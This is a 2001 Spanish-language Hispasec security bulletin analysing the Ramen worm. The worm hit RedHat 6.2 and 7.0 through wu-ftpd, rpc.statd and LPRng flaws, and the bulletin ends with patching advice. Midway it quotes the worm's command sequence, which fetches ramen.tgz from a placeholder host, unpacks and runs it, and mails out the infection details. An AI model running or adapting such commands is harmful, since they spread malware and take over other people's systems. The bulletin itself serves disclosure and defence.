|
> -------------------------------------------------------------------- > Hispasec - una-al-d�a 21/01/2001 > Todos los d�as una noticia de seguridad www.hispasec.com > -------------------------------------------------------------------- > > Un gusano muy activo afecta a sistemas Linux de todo el mundo > ------------------------------------------------------------- > En los �ltimos d�as ha surgido en la red un gusano que ya se encuentra > in the wild. Ramen, nombre que recibe este nuevo pat�geno, afecta a > sistemas RedHat 6.2 y RedHat 7.0 aprovech�ndose de vulnerabilidades > conocidas desde hace tiempo y con parches para ellas en los servicios > rpc, wuftp o LPRng. > > Este nuevo gusano ha pillado desprevenida a toda la comunidad Linux, > que no esperaba nada semejante y siempre ha permanecido convencida de > la seguridad de sus sistemas frente a virus y gusanos que tanto > afectan en la actualidad a los sistemas Windows. Pero en esta ocasi�n, > una elaborada y efectiva colecci�n de herramientas destinadas a > explotar vulnerabilidades ha conseguido poner en jaque a los sistemas > Linux de todo el mundo. > > Es falso que no existen virus o gusanos para Linux o Unix, pero en la > actualidad la propia arquitectura de Windows se presenta como una > plataforma m�s vulnerable ante el ataque de virus en comparaci�n con > la robustez que pueden alcanzar los sistemas Unix convenientemente > administrados. Sin embargo, Ramen representa un serio toque de > atenci�n tanto a la comunidad Unix como a las propias casas antivirus, > que a partir de ahora deber�n prestar mayor atenci�n a posibles brotes > de este tipo de espec�menes. > > Ramen afecta a sistemas RedHat Redhat 6.2 a trav�s de un servicio rpc > explotable o de un wuftpd vulnerable, para los sistemas RedHat 7.0 el > gusano infecta haciendo uso de una vulnerabilidad en LPRng. A su paso, > el gusano deja un rastro de p�ginas web modificadas en los servidores > atacados, con un gr�fico en el que se hace alusi�n a los tallarines > orientales de marca Ramen. En la p�gina modificada el gusano tambi�n > deja la frase "Hackers looooooooooooove noodles," y aparece firmado > como "RameN Crew". Ya han aparecido hasta servidores de la NASA con > esta huella que da signos evidentes del paso del gusano por el > sistema. > > Ramen realiza un escaneo de clases B mediante una exploraci�n SYN > consistente en una versi�n modificada de synscan. Esta exploraci�n > puede llevar entre 15 y 25 minutos y pretende localizar sistemas > Redhat 6.2 o 7.0. Durante el rastreo Ramen comprueba el anuncio del > tipo de servidor de FTP, s�lo comprueba el puerto 21 para esto, si > aparece la cadena "Mon Feb 28" grabar� la IP y/o el nombre de host en > el archivo ".w". En cambio, si encuentra la cadena "Wed Aug 9", > grabar� los datos en el archivo ".l". De esta forma realiza una > clasificaci�n de la versi�n de sistema operativo, RedHat 6.2 en el > primer caso y 7.0 en el segundo. > > Tras esto se lanzar�n dos scripts diferentes dependiendo de cada > sistema contra las direcciones de dichos archivos. Contra las m�quinas > RedHat 6.2 emplear� la lista del archivo ".w" ejecutar� primero un > exploit contra el wu-ftpd, tras este ataque se ejecutar� un exploit > contra rpc.statd en la m�quina objetivo. En caso de lograr su objetivo > ejecutar� la siguiente secuencia de comandos: > > mkdir /usr/src/.poop;cd /usr/src/.poop > export TERM=vt100 > lynx -source http://FROMADDR:27374 > /usr/src/.poop/ramen.tgz > cp ramen.tgz /tmp > gzip -d ramen.tgz;tar -xvf ramen.tar;./start.sh > echo Eat Your Ramen! : mail -s TOADDR -c [EMAIL PROTECTED] > [EMAIL PROTECTED] > > Destinada a enviar un mensaje con las direcciones de la m�quina desde > la que se lanza el ataque y la nueva m�quina infectada. El mail se > env�a a las direcciones [EMAIL PROTECTED] y [EMAIL PROTECTED] > > Para atacar a los sistemas con RedHat 7 Ramen emplea un ataque contra > LPRng. Este programa es una implementaci�n de una utilidad de spool de > impresora. > > Una vez en el sistema el gusano establece un peque�o servidor HTTP/0.9 > en el puerto 27374 que se emplea para servir copias de si mismo al > exterior (esto se realiza a trav�s de inetd en RedHat 6.2 y xinetd en > RedHat 7.0). para reproducirse a si mismo, determina la direcci�n IP > y elima los servicios vulnerable que le han servido para introducirse > en el sistema. Es decir, en RedHat 6.2 eliminar� rpc.statd y en > RedHat 7.0 lpd. De forma adicional a�adir� los usuarios "ftp" y > "anonymous" al archivo /etc/ftpusers para cerrar el agujero en > wu-ftpd. Para finalizar modificar� todos los archivos index.html por > la p�gina anteriormente descrita. > > Para evitar la infecci�n por este gusano es conveniente actualizar los > sistemas RedHat. Todas los parches necesarios para cubrir las > vulnerabilidades descritas se encuentran disponibles en el sitio web > de RedHat. Hay que aclarar, como ya hemos comentado, que los parches > no son espec�ficos para este gusano, sino que cierran vulnerabilidades > detectadas y solucionadas hace tiempo. > > Desde Hispasec una vez m�s recordamos y recomendamos la necesidad de > mantener los sistemas actualizados, labor que deben realizar tanto los > administradores de sistemas en las empresas como los usuarios en sus > equipos dom�sticos. > > Opina sobre esta noticia: > http://www.hispasec.com/unaaldiacom.asp?id=819 > > M�s informaci�n: > > Descripci�n de Ramen > http://members.home.net/dtmartin24/ramen_worm.txt > > Vulnerabilidad en wu-ftp (Securityfocus) > http://www.securityfocus.com/vdb/bottom.html?vid=1387 > > Vulnerabilidad en rpc.statd (Securityfocus) > http://www.securityfocus.com/vdb/bottom.html?vid=1480 > > Vulnerabilidad en LPRng (Securityfocus) > http://www.securityfocus.com/vdb/bottom.html?vid=1712 > > Ramen afecta a la NASA (Securityfocus) > http://www.securityfocus.com/templates/article.html?id=141 > > Silicon.com > http://www.silicon.com/public/door?REQUNIQ=979925654&6004REQEVENT=&REQINT1=4 2151&REQSTR1=newsnow > > Linux Today > http://linuxtoday.com/news_story.php3?ltsn=2001-01-18-006-06-SC > > Computerworld > http://www.computerworld.com/cwi/stories/0,1199,NAV47-68-84-88_STO56475,00.h tml > > CMPTR > http://www.cmptr.com/view.php?id=502 > > > Antonio Ropero > [EMAIL PROTECTED] > > > -------------------------------------------------------------------- > (c) Hispasec, 2001 www.hispasec.com/copyright.asp > -------------------------------------------------------------------- > |
